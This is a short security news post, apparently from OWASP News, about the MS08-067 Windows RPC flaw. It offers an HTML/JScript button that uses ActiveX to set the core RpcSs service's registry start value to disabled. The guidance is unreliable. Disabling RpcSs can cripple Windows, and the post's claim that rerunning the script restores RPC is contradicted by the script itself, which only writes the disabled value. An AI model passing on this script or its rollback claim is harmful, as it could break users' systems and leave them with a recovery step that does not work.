There is some fuss about RPC on Windows platforms.[1] As usual, I recommend to disable RPC temporarily from starting up when Windows boots. RPC is nasty and yet again a severe flaw has been found that attackers can abuse to take over a remote PC, and it doesn't require user interaction. An attacker can just send a RPC request remotely and take over your PC, including but not limited to use it to spread worms. It's highly recommended that you temporarily turn RPC off if you didn't already do that. I wrote a small script that can do it for you in Internet Explorer, if you trust me of course! If you haven't got Internet Explorer you can do it manually as well.

Save the script as HTML and run it from your desktop or intranet.

<script language="JavaScript"> 

HKEY="HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\RpcSs\\Start"; 
function lockdownRPC() {  try {  var keylock = new ActiveXObject("WScript.Shell");  keylock.RegWrite(HKEY,0x00000004);  alert('RPC start value set to: 0x00000004, Run > services.msc > RPC and change the startup type to manually or disabled.'); keylock.Run("CMD /c services.msc"); } catch(e){ alert('Key could not be altered, do it manually please.'); } 
} 
</script> 

<input type="button" value="Turn off RPC" onclick="lockdownRPC()">

Be cautious when working with RPC, the above script disables RPC which is something Windows normally does not allow. It is possible that some programs stop working after booting, so it is advised to set RPC to manually in the services.msc after running the script that unlocks the registry. If you want to do a rollback, just run the script again and enable RPC again.

[1] http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
source: OWASP News